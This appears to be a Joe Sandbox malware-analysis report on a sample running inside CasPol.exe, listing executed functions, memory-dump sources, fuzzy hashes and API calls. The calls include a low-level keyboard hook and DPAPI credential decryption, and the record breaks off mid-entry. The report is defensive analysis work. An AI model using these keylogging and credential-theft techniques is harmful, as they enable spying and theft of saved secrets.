Instruction Fuzzy Hash: BFF0F631104954FFD702DFA5DD04E9FBBA8EF06350B2180BAE841F7210D674DE01ABA8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CasPol.exePID: 7240, Parent PID: 5272COMMON

Execution Graph

Execution Coverage:	22%
Dynamic/Decrypted Code Coverage:	99.2%
Signature Coverage:	0%
Total number of Nodes:	250
Total number of Limit Nodes:	28

Executed Functions

Function 01462768 Relevance: 5.3, Strings: 4, Instructions: 340
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oWl, xrefs: 01462870
(oWl, xrefs: 01462862
,[l, xrefs: 014628E8
,[l, xrefs: 014628DA

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: (oWl$(oWl$,[l$,[l
API String ID: 0-3043059810
Opcode ID: 7cad42832645cf41ac10df5923d44f01f558aa40e8194c8f7942dd1431bdd66e
Instruction ID: 189c8c22e133aec5ca5bb5523a3261450c147c3bd5ceca19ab307fe27ef982d1
Opcode Fuzzy Hash: 7cad42832645cf41ac10df5923d44f01f558aa40e8194c8f7942dd1431bdd66e
Instruction Fuzzy Hash: 05D13B70A00119EFDB14CFA8C984EAEBBB6FF88358F158156E905AB371D7B4D842CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0146DE78 Relevance: 5.3, Strings: 4, Instructions: 297
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

X[l, xrefs: 0146E297
X[l, xrefs: 0146E1DE
X[l, xrefs: 0146E218
X[l, xrefs: 0146E2E4

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: X[l$X[l$X[l$X[l
API String ID: 0-4246460527
Opcode ID: 7d0805c31ac162e1d67f1d23440f7bde183f25cf4f1cf3693133296701055771
Instruction ID: b4b715b7d625b02390db849c4f8fff604bb30715387675023688513aa896a6e0
Opcode Fuzzy Hash: 7d0805c31ac162e1d67f1d23440f7bde183f25cf4f1cf3693133296701055771
Instruction Fuzzy Hash: 09B1C334A042148FDB24DB78C9547AFBAE7AFC5208F15846AD10AAB7B5DF70DC418B93

Uniqueness

Uniqueness Score: -1.00%

Function 01461FF0 Relevance: 3.0, Strings: 2, Instructions: 509COMMON

Download Yara Rule

Strings

H[l, xrefs: 014623F2
(oWl, xrefs: 01462526

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: (oWl$H[l
API String ID: 0-31606315
Opcode ID: c3a4cd2f5eb56109bb3fc8a60adb8adfbf7fc6e9f4e2f8664f8c5157d8631681
Instruction ID: 17db592d8575323cc1431b508fabd5f0f461949e32777ab8647b238d73dd7d5b
Opcode Fuzzy Hash: c3a4cd2f5eb56109bb3fc8a60adb8adfbf7fc6e9f4e2f8664f8c5157d8631681
Instruction Fuzzy Hash: 4112C374A042199FCB14CF68C894BAEBBF6BF88304F158029E909EB365DB74DD41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01461AC1 Relevance: 2.7, Strings: 2, Instructions: 227COMMON

Download Yara Rule

Strings

,[l, xrefs: 01461BB0
,[l, xrefs: 01461BA6

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: ,[l$,[l
API String ID: 0-2823674409
Opcode ID: 58e10701d9857167fefdc0bf86a053feb1375fc7361f8bad68586b5cfaf5ce10
Instruction ID: f30050a74624ae46741ef40f3168b97fb11c313aac1db478bbc2f46f553b1929
Opcode Fuzzy Hash: 58e10701d9857167fefdc0bf86a053feb1375fc7361f8bad68586b5cfaf5ce10
Instruction Fuzzy Hash: 8D81D330B00205CFDB04DF6DC8849AEBBB9BFC9A49B15806AD516DB375D731E842CB52

Uniqueness

Uniqueness Score: -1.00%

Function 1C7EE9E0 Relevance: 1.9, APIs: 1, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89333831365.000000001C7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1C7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1c7e0000_CasPol.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: f132cecb70741fb615c6f2939044bca46b2e8c4227668c021a430cb7d5413ed6
Instruction ID: c2ec2d48b4eb811938bd6ded0881bec30a257948c6da69bda500f8d7d2201eba
Opcode Fuzzy Hash: f132cecb70741fb615c6f2939044bca46b2e8c4227668c021a430cb7d5413ed6
Instruction Fuzzy Hash: EBF17F31A00219CFDB00CFA5C988B9DB7F5BF48304F158969E409AF3A5DBB5E945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1C7E1010 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 1C7E1673

Memory Dump Source

Source File: 00000004.00000002.89333831365.000000001C7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1C7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1c7e0000_CasPol.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 5c2a4b4ba854373e939bd9981c6b42f916f7861ee4fd35409c907adccf8f17f3
Instruction ID: 704ad0ee3bee277a18ac65998e03a601731a49e0b2bfe8a8204c05e735607a33
Opcode Fuzzy Hash: 5c2a4b4ba854373e939bd9981c6b42f916f7861ee4fd35409c907adccf8f17f3
Instruction Fuzzy Hash: 732104B1D042099FCB14CF99D844BEEBBF4EB88314F14842AE455A7350CBB4A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 010DD808 Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 010DDF5D

Memory Dump Source

Source File: 00000004.00000002.89315813147.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10d0000_CasPol.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 79810709e0f1f5f9ea1376e1797a4cebf8994b36a8dedfc89cb4f899d454bd14
Instruction ID: 52e4b0d414733c360000299bf1968b8d8d6f9e28f75c1fc981b234d07e4e9406
Opcode Fuzzy Hash: 79810709e0f1f5f9ea1376e1797a4cebf8994b36a8dedfc89cb4f899d454bd14
Instruction Fuzzy Hash: 7A1156B28042099FCB10CF99C844BDEBFF4EF48324F14845AE668A7241C378A950CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 010DDEF0 Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 010DDF5D

Memory Dump Source

Source File: 00000004.00000002.89315813147.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10d0000_CasPol.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 43f509afd181640bdcaf32962dbb8a8c138ab0d3c28897c75cbf5ae5f7af0b07
Instruction ID: b418e4a7da7767cee12815e2e3a2ae6312814dd3d4871a6e352750fc2c2063f5
Opcode Fuzzy Hash: 43f509afd181640bdcaf32962dbb8a8c138ab0d3c28897c75cbf5ae5f7af0b07
Instruction Fuzzy Hash: 1D2144B28042099FCF10CFA9D444BEEBFF0EF48324F14845AE568A7651C375A951DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0146B439 Relevance: .7, Instructions: 676COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eaa74a5fccc3c04572ba83ba153a15028b38c9bf2f196b4c3d01934c6982e15
Instruction ID: 8dea43183770f3db5e7b842ecd55ac025c84af5e1095db4d099e2401e475de64
Opcode Fuzzy Hash: 7eaa74a5fccc3c04572ba83ba153a15028b38c9bf2f196b4c3d01934c6982e15
Instruction Fuzzy Hash: 4D42B330B082448FDB24DB68C9547AEBBA6EF85308F15806AD509DF3A6DB74DC85CB53

Uniqueness

Uniqueness Score: -1.00%

Function 01462D50 Relevance: 10.4, Strings: 8, Instructions: 450
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oWl, xrefs: 01462E65
,[l, xrefs: 014631E0
(oWl, xrefs: 01462F02
(oWl, xrefs: 01462D7E
(oWl, xrefs: 0146324F
(oWl, xrefs: 0146325F
(oWl, xrefs: 01462E39
,[l, xrefs: 014631F0

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: (oWl$(oWl$(oWl$(oWl$(oWl$(oWl$,[l$,[l
API String ID: 0-2243995069
Opcode ID: 3935b6cfd345b0d9ae8a41b19bd3210a4823a99e50ac0293b3863cbf3c72a4f3
Instruction ID: 8e6464b4b6398bf876cd9a9741d0e152a45d249f868f35a10ac9460748ec9a26
Opcode Fuzzy Hash: 3935b6cfd345b0d9ae8a41b19bd3210a4823a99e50ac0293b3863cbf3c72a4f3
Instruction Fuzzy Hash: 4B125930A04249DFDB14CF69C984A9EBBF6BF48318F15856AE909DB361DB30ED41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1D6CA308 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 1D6CA386
GetCurrentThread.KERNEL32 ref: 1D6CA3C3
GetCurrentProcess.KERNEL32 ref: 1D6CA400
GetCurrentThreadId.KERNEL32 ref: 1D6CA459

Memory Dump Source

Source File: 00000004.00000002.89335991344.000000001D6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d6c0000_CasPol.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 51a6db9a53d5759c78d39e460d91a533b522a01fcc3d70f09c0677a4ff95e47b
Instruction ID: a0b5e0df53bcfde73e57d65707e5a417107c044865b585f19adcc593c44af82e
Opcode Fuzzy Hash: 51a6db9a53d5759c78d39e460d91a533b522a01fcc3d70f09c0677a4ff95e47b
Instruction Fuzzy Hash: 87519AB0D046098FDB00CFA9C588BAEBBF1EF88304F24C459E10AA7350D739A941CF66

Uniqueness

Uniqueness Score: -1.00%

Function 01046350 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 376
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetActiveWindow.USER32 ref: 0104657E

Strings

H[l, xrefs: 010467DF
H[l, xrefs: 0104679A

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: ActiveWindow
String ID: H[l$H[l
API String ID: 2558294473-4116850605
Opcode ID: 44d88bd48d97073078d0679cc4abd25529019181f4934c9ddb9cac250a9ef2fe
Instruction ID: d5b49fc94b75f14f7e9788df4d383eaf2cc19d24c60b410450f34edd019bdbe5
Opcode Fuzzy Hash: 44d88bd48d97073078d0679cc4abd25529019181f4934c9ddb9cac250a9ef2fe
Instruction Fuzzy Hash: 70D105B0B042559FDB049F78C4547AE7BE2AF89304F058439EA45EB395EF3ADC428B52

Uniqueness

Uniqueness Score: -1.00%

Function 010DF311 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 171
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 010DF3CF

Strings

LRWl, xrefs: 010DF406
LRWl, xrefs: 010DF46A

Memory Dump Source

Source File: 00000004.00000002.89315813147.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10d0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID: LRWl$LRWl
API String ID: 2994545307-1806531169
Opcode ID: 0dc4b41b503dac2eb7493ddda5a5535360a62fd9e96c20051286e1af9b60f584
Instruction ID: ac62f8df7925ac6fee57858e91a598a0466d0a6a02fde81d4995fe2638e4bd95
Opcode Fuzzy Hash: 0dc4b41b503dac2eb7493ddda5a5535360a62fd9e96c20051286e1af9b60f584
Instruction Fuzzy Hash: 3E51E130A043069FCB04DBB4C884AEE77F5AF89204F05856AE546DB3A1DF74ED4587A1

Uniqueness

Uniqueness Score: -1.00%

Function 010DF370 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 148
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 010DF3CF

Strings

LRWl, xrefs: 010DF406
LRWl, xrefs: 010DF46A

Memory Dump Source

Source File: 00000004.00000002.89315813147.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10d0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID: LRWl$LRWl
API String ID: 2994545307-1806531169
Opcode ID: 3db589773180cc3eaf041393377ecc3bf93a058ef0e70576a41b318f93409d51
Instruction ID: ffd073ff81b381859a0a7c5e7937bf0b722f2c29b4caeb8e2eec11dbd7763c74
Opcode Fuzzy Hash: 3db589773180cc3eaf041393377ecc3bf93a058ef0e70576a41b318f93409d51
Instruction Fuzzy Hash: 8551BF71A003099FCB08EFB4C894AAEB7B6BF88204B058969E546DB351DF74EC45C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0146D308 Relevance: 5.3, Strings: 4, Instructions: 274
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,[l, xrefs: 0146D669
H[l, xrefs: 0146D54D
H[l, xrefs: 0146D51A
,[l, xrefs: 0146D64E

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: ,[l$,[l$H[l$H[l
API String ID: 0-3936023008
Opcode ID: a8404e53e2550f99f00676a9fb3d37d5261c72786b9886f3261499d2f78130a8
Instruction ID: 57ef3604f26c2ca02d332d83d0baef4c7f8876e72a98bc7e8e2a163125ce9e3a
Opcode Fuzzy Hash: a8404e53e2550f99f00676a9fb3d37d5261c72786b9886f3261499d2f78130a8
Instruction Fuzzy Hash: E9A1D730B042159FCB05DFA8C854BAE77A6AFC8358F15802AF609DB3A5DB75DC42C792

Uniqueness

Uniqueness Score: -1.00%

Function 01462D4F Relevance: 5.3, Strings: 4, Instructions: 269
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oWl, xrefs: 01462E65
(oWl, xrefs: 01462F02
(oWl, xrefs: 01462D7E
(oWl, xrefs: 01462E39

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: (oWl$(oWl$(oWl$(oWl
API String ID: 0-2616711353
Opcode ID: 1952001702996cd4b3cc2a42472f3eeb96051c53c10c0df38d7a76ddd8566812
Instruction ID: c88c559089887fcb7d92df8f7f08bf1e800d31a13f00ebb162260e8c5435f5f1
Opcode Fuzzy Hash: 1952001702996cd4b3cc2a42472f3eeb96051c53c10c0df38d7a76ddd8566812
Instruction Fuzzy Hash: 17C14A30A002499FCB14CF69C984E9EBBFABF48318F15855AE919EB361D730ED41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0146AE98 Relevance: 4.2, Strings: 3, Instructions: 432
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

f\l, xrefs: 0146B361
PHWl, xrefs: 0146B3D7
f\l, xrefs: 0146B36D

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: f\l$ f\l$PHWl
API String ID: 0-2832035783
Opcode ID: 3e81b25c8b60f084f0bd4ee7d60ad115bb8187b69396fb9c1aa624e0b27103c9
Instruction ID: 6d466ec8dabb321d3c1886a491684208fb1a666c5d8a56177a4900b6e0e44903
Opcode Fuzzy Hash: 3e81b25c8b60f084f0bd4ee7d60ad115bb8187b69396fb9c1aa624e0b27103c9
Instruction Fuzzy Hash: CAE1A234B042158FDB199B78C8547AE7BF6EF89348F20882AD50ADB395EF34DC468752

Uniqueness

Uniqueness Score: -1.00%

Function 01465A58 Relevance: 3.6, Strings: 2, Instructions: 1097COMMON

Download Yara Rule

Strings

X[l, xrefs: 01465D45
X[l, xrefs: 01465D0D

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: X[l$X[l
API String ID: 0-1119060972
Opcode ID: 1c2e8d3e0c412bfa6e4cc9a2fe51f1e02d9353145d25c2f5148fce2f3c890cc7
Instruction ID: 98585829bef7b0c4003cd96d003845f3224cc40538e61af60a3d8c38aed7f90e
Opcode Fuzzy Hash: 1c2e8d3e0c412bfa6e4cc9a2fe51f1e02d9353145d25c2f5148fce2f3c890cc7
Instruction Fuzzy Hash: C1727D354A97518BE354EFA4819119FB7A3FF83368F61C5BFC4D70A522F631980687A0

Uniqueness

Uniqueness Score: -1.00%

Function 014616C8 Relevance: 2.6, Strings: 2, Instructions: 131COMMON

Download Yara Rule

Strings

H[l, xrefs: 014617E6
H[l, xrefs: 014617B3

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: H[l$H[l
API String ID: 0-4116850605
Opcode ID: d52c5d035aff6065b6e9e29cfc66fedc80e5fd6c7ef49521a39c06921a2396b5
Instruction ID: 969badfd780ce0de4f79efc5067a567ce483f1ae9f49683e4aba1a66273684db
Opcode Fuzzy Hash: d52c5d035aff6065b6e9e29cfc66fedc80e5fd6c7ef49521a39c06921a2396b5
Instruction Fuzzy Hash: 0341E7752042548FDB128F28C894AAE7BF6FFC9719F058456E905CB3A1DB3D9802C762

Uniqueness

Uniqueness Score: -1.00%

Function 0146B3F1 Relevance: 2.6, Strings: 2, Instructions: 128COMMON

Download Yara Rule

Strings

f\l, xrefs: 0146B361
PHWl, xrefs: 0146B3D7

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: f\l$PHWl
API String ID: 0-3640971053
Opcode ID: 471fbbfef87e62390d1029fa880db0c5763345e25e5978ab55a805be1b28aee1
Instruction ID: d09e01b918f2af8e5f773432fcf54ddd47e63fba10d89e8eed2b2bcfe1063c58
Opcode Fuzzy Hash: 471fbbfef87e62390d1029fa880db0c5763345e25e5978ab55a805be1b28aee1
Instruction Fuzzy Hash: 53414234B002248FDB589BB5C46877E7AFAEF88244F144429E906DB7A4DF74DC468B92

Uniqueness

Uniqueness Score: -1.00%

Function 01464C88 Relevance: 2.6, Strings: 2, Instructions: 103COMMON

Download Yara Rule

Strings

$Wl, xrefs: 01464D44
$Wl, xrefs: 01464D67

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: $Wl$$Wl
API String ID: 0-3974895240
Opcode ID: 040a031aa70e50db45077c55ce8de697cccf2866de08ca935674666f57f1c0ad
Instruction ID: ffa94246f3bdb98b4a7db77685aff94fb47964cab8f7895760901d188f71fe73
Opcode Fuzzy Hash: 040a031aa70e50db45077c55ce8de697cccf2866de08ca935674666f57f1c0ad
Instruction Fuzzy Hash: 54318430B082108FDF26DA6DC89467E7BADAF52628B1D0467D512CB372DB35DC4287A3

Uniqueness

Uniqueness Score: -1.00%

Function 0104BFD0 Relevance: 2.5, APIs: 1, Instructions: 984libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e3929af3d4af90ff30712244443fa983012b591cb2e180e70dd63a45fb56fbdf
Instruction ID: 0b42809aa97d2d5ad925444fdc1f86505e6554d9eb07b5296038850ab80b5399
Opcode Fuzzy Hash: e3929af3d4af90ff30712244443fa983012b591cb2e180e70dd63a45fb56fbdf
Instruction Fuzzy Hash: 13A246B4A01228CFCB68EF34C88869DB7B6BF98205F1084E9D54AA3744DF359E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0104BFF1 Relevance: 2.1, APIs: 1, Instructions: 635libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 408a5c331b47a090d0d5bce5b9f03760759f7936a3e53b298f88ec6135efb7c6
Instruction ID: 4e0cd6d20628787a9783714e0634cf135108b90bad8b1537b2ff54225e53333e
Opcode Fuzzy Hash: 408a5c331b47a090d0d5bce5b9f03760759f7936a3e53b298f88ec6135efb7c6
Instruction Fuzzy Hash: 416268B4A01228CFDB68EF74C88869DB7B6BF58205F5084E9D949A3744CF399E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0104C02F Relevance: 2.1, APIs: 1, Instructions: 630libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b36c44b86fca7f47cbee1e8e61858964b7552bf56c5c1f0d2164eb154ca2453b
Instruction ID: 912f5df7d4793039ea40acb9c45950cf2e7d4578a749e4aacdd3b4b755f3e8fd
Opcode Fuzzy Hash: b36c44b86fca7f47cbee1e8e61858964b7552bf56c5c1f0d2164eb154ca2453b
Instruction Fuzzy Hash: EA5268B4A01228CFDB68EF74C88869DB7B6BF58205F5084E9D949A3744CF399E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0104C076 Relevance: 2.1, APIs: 1, Instructions: 621libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 368f22b74f68c21c835ec43ddb6d1176aebfae991f5b857c7a36df48f2cb49d2
Instruction ID: 4457e9b514e5db32fe62bec7ec6cd279d4937844130431adc7148895b9cb4538
Opcode Fuzzy Hash: 368f22b74f68c21c835ec43ddb6d1176aebfae991f5b857c7a36df48f2cb49d2
Instruction Fuzzy Hash: 035268B4A01224CFDB68EF74C88869DB7B6BF98205F5084E9D949A3744CF399E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0104C0B4 Relevance: 2.1, APIs: 1, Instructions: 616libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a914f8f9cc92aa4e514683a87384748ca089255f94ac4d5832d9e2798143d151
Instruction ID: 77e570775c02a6d4cfacbdd623faf6ac6a57c865ca908b9776d705f0bcd3cada
Opcode Fuzzy Hash: a914f8f9cc92aa4e514683a87384748ca089255f94ac4d5832d9e2798143d151
Instruction Fuzzy Hash: 135268B4A01228CFDB68EF74C88869DB7B6BF58205F5084E9D949A3744CF399E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0104C0FB Relevance: 2.1, APIs: 1, Instructions: 609libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3691a01af9e673e824d0f167a01bcdddc1dfc7ceb02add623b043d49e4625473
Instruction ID: 47789f5cbffa71c4dc07089b811f35d7312a9a987478d067cc866033611a1eaf
Opcode Fuzzy Hash: 3691a01af9e673e824d0f167a01bcdddc1dfc7ceb02add623b043d49e4625473
Instruction Fuzzy Hash: 255269B4A01228CFCB68EF74C88869DB7B6BF58205F5084E9D949A3744CF399E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0104C142 Relevance: 2.1, APIs: 1, Instructions: 602libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5fb0f4263382f5bc8ceff9f4846988ed50442f708e4476242f99a39671d09fd6
Instruction ID: 83e5d16d3000010090b176d07cba843364b0465158e46b5fa3ac33ce22ff42ed
Opcode Fuzzy Hash: 5fb0f4263382f5bc8ceff9f4846988ed50442f708e4476242f99a39671d09fd6
Instruction Fuzzy Hash: 8A5268B4A01228CFCB68EF74C88869DB7B6BF58205F5084E9D949A3744CF399E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0104C189 Relevance: 2.1, APIs: 1, Instructions: 595libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1ebec47a14c538d426b11100a6a06e7be7fa8cabc313b692fed3ac19439b064c
Instruction ID: c0e96a4c12243205bbfba115fc023df2503e9b554e5960f61601f92c1f856712
Opcode Fuzzy Hash: 1ebec47a14c538d426b11100a6a06e7be7fa8cabc313b692fed3ac19439b064c
Instruction Fuzzy Hash: EB5268B4A01228CFCB68EF74C88869DB7B6BF98205F5084E9D549A3744CF399E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0104C1D0 Relevance: 2.1, APIs: 1, Instructions: 588libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

